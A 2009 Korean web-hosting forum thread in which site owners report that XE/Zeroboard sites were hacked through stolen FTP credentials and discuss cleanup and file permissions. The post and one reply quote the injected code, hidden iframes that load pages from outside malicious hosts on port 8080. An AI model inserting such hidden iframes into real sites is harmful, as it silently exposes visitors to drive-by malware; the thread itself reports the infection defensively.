techus qrcode
MEMBER LOGIN

  • Server : Sulinux 2.0
  • Apache/2.0.64 (unix)
  • PHP version 5.2.17
  • Mysql 5.0.92
  • 1차: ns1.techus.net (211.232.13.7)
  • 2차: ns2.techus.net (211.232.13.3)
  • 현재 네임서버 제공 안합니다.
  • 네임서버는 도메인관리업체에서
  • 제공하는 네임서버로 하시고
  • 레코드관리 A : 211.232.13.7 로
  • 설정 하세요.감사합니다.

DNS Powered by DNSEver.com
  • MySQL DB 연결설정 ( http://www.ausangel.org/bbs/

    MySQL DB 연결설정 ( http~

  • 게시글 글등록시 관리자 네이트온으로 알림

    게시글 글등록시 관~

  • 게시판 글등록시 관리자 마이피플로 알림

    게시판 글등록시 관~

  • 선생님 설명입니다..^^

    선생님 설명입니다..^~

  • 테크 모바일을 위한 크롬

    테크 모바일을 위한 ~

  • 3단CSS메뉴 플러그인(멋쟁이님 삽질 빌더용) ”

    3단CSS메뉴 플러그인(~

  1. 1. 뭇쏘 509,500
  2. 2. 아이케 268,835
  3. 3. 예랑맨 182,270
  4. 4. bluewolf 163,255
  5. 5. 청주산의 154,395
  6. 6. 이규하 148,225
  7. 7. 아이슬 119,730
  8. 8. 선장 112,365
  9. 9. 조나단 105,110
  10. 10. SDK 98,895
  1. 1. 청주산의 3345
  2. 2. 아이케 2823
  3. 3. 예랑맨 1611
  4. 4. SDK 1027
  5. 5. 이규하 951
  6. 6. 늑대소냐 726
  7. 7. bluewolf 495
  8. 8. 컴퓨터나라 385
  9. 9. 아이슬 345
  10. 10. 어우름 282
  1. jkwon ♂ 12/27
  2. angel ♂ 12/19
  3. isaac ♂ 5/26
  4. 랩퍼투혼 ♂ 11/24
  5. 노톨릭 ♂ 9/23
  6. wertetrrt ♀ 4/9
  7. 레드 ♂ 3/31
  8. medipara ♂ 3/11
  9. 밥통 ♂ 4/16
  10. 우짜맨 ♂ 1/16
자유게시판 메인 » 자유게시판 » XE 쓰시는분 꼭 읽어주세요!!
 
추천:0 조회:2823

title XE 쓰시는분 꼭 읽어주세요!! [7]

2009-08-07 (금) 22:41 우암 (IP:114.xxx.32)

아이유홀릭 (iuholic.com)이 여러차례 접속이 안되는 문제가 발생했습니다.
사실 청주산의 선생님 도움이 아니였으면 문제도 찾지 못했을뻔 했습니다.;;;;
XE 취약점을 이용한 해킹이 이루어지고 있다고합니다.
제로보드 홈페이지에 올라온 다른 분들 사례로 FTP 접속이 해외에서 이루어지고 index.php 파일이 수정된 기록을 확인했다고 합니다.

홀릭 역시
index.php 파일 하단에
<iframe src="http://nqrl.in:8080/index.php" width=114 height=159 style="visibility: hidden"></iframe>
라는 문구가 3번정도 자동입력되어 접속이 안됬습니다;;
현재 XE에는 이런 사례가 보고된 글들이 몇건씩 올라오고 있구요.
보안패치가 나오지 않으면, 계속해서 위같은 문제가 발생할 것 같습니다.
홈페이지 운영중 접속이 안되시는분은 제일 먼저 index.php 파일을 확인해 보시구요.
소용이 있을지는 모르겠지만, FTP 비밀번호도 수시로 바꿔주는것도 예방 방법중 하나입니다..
index.php침투를 하도 많이 당해서 이제는 귀찮아지네요;;;
어서빨리 취약점 보안 패치가 올라와야 할텐데요...
no character
우암
반갑습니다.
댓글 7개

이름아이콘 청주산의

에궁, 그런 문제가... 09.08.07 23:08

   

이름아이콘 온라

index.php 파일을 644 로 권한을 만들면 접속이 되나요!~^^

제가 회사라.. 확인을 안해봤지만..

그렇게 하면 취약점을 보완할수도 있을거 같은데...???

테스트를 못해봐서리.. 회사는 FTP 를 막아놔서리..ㅋㅋ 09.08.08 00:41

   

이름아이콘 온라

또는 655로는 접속이 가능할지... 아 낼 집에가면 함 테스트 해봐야 겠네요!~~

외국의 툴같은경우는 뭐 물론 설치시에는 707해야겠지만... 나중에 설치후에 보안문제등의 이유로

655나 644등으로 변경하는거 같던데..?? 09.08.08 01:01

   

이름아이콘 NeverOut

회원캐릭터

<iframe src="http://udta.in:8080/index.php" width=188 height=180 style="visibility: hidden"></iframe>
저도 확인해보니 있군요....  얼릉 지워버렸습니다~
지금 권한도 644로 되어 있네요.... 09.08.08 05:12

   

이름아이콘 온라

음... 그렇게 해도 그게 입력이 되는군요... 무셔운거군...^^ 09.08.08 10:02

   

이름아이콘 아이케

네버아웃님은 테크쓰시지 않나요?
테크도 걸리나...;; 09.08.08 11:00

   

이름아이콘 온라

제노바이러스 인걸로 나오네요~^^  일단은 PC 보안문제로 FTP 의 아이디와 비번이 뚤리니.. 당연히..

644 해도 그런현상이 발생하는거 같네요~~ 제노바이러스 체크하시길..^^ 09.08.08 11:09

   

0/3500 secret 파일첨부
FILE #1 .
FILE #2 .
FILE #3 .
FILE #4 .
FILE #5 .
FILE #6 .
FILE #7 .
FILE #8 .
FILE #9 .
FILE #10 .
다중선택옵션 번호 제목 글쓴이 날짜 조회
171 accesskey 관련 질문입니다^^ [2] name icon 카즈키™ 08-08 (토) 2397
170 우리도 ftp 막고 sftpd 로 사용할까요? [8]+1 청주산의 08-08 (토) 2411
169 주의 나인볼..! [2] name icon 온라 08-08 (토) 2411
168 주의! 제노~^^ name icon 온라 08-08 (토) 2411
167 긴급동의? [7]+2 예랑맨 08-08 (토) 2615
166 웹사이트 로딩시간 확인해보세요!~^^ [2] name icon 온라 08-08 (토) 3089
165 이사를 했더니만..... [6]+1 고길동 08-07 (금) 3111
164 XE 쓰시는분 꼭 읽어주세요!! [7] name icon 우암 08-07 (금) 2823
163 비옵니다..태커스회원님들 무탈하시길... [7]+2 알타리 08-07 (금) 2396
162 속도 비교 부탁합니다. [11]+1 청주산의 08-07 (금) 2396
161 트래픽초과 페이지 [5] 아이케 08-07 (금) 4144
160 오늘은... [5] 예랑맨 08-07 (금) 2523
159    Re..감사합니다. [1] 예랑맨 08-08 (토) 2396
158 아이콘...적용!ㅋ [5]+2 name icon 온라 08-07 (금) 2396
157    Re..음^^;;;;;;;;;; [3]+1 아이케 08-07 (금) 2528
156 요즘의 생각중인 사이트 계획. [3]+3 name icon 카즈키™ 08-06 (목) 3143
155 아이케님 a/s 안되는것으로 이제 99.9%완성 [3] 진성물류 08-06 (목) 2526
154 죄송하지만...또다시 제로보드 질문... [4] 고구마s 08-06 (목) 2530
153 '아시아의 물개' 조오련 타계 [1] 온라 08-06 (목) 2910
152 1박2일 수도맞추기 댓글 달기 캠페인..^^ [1] 온라 08-06 (목) 2396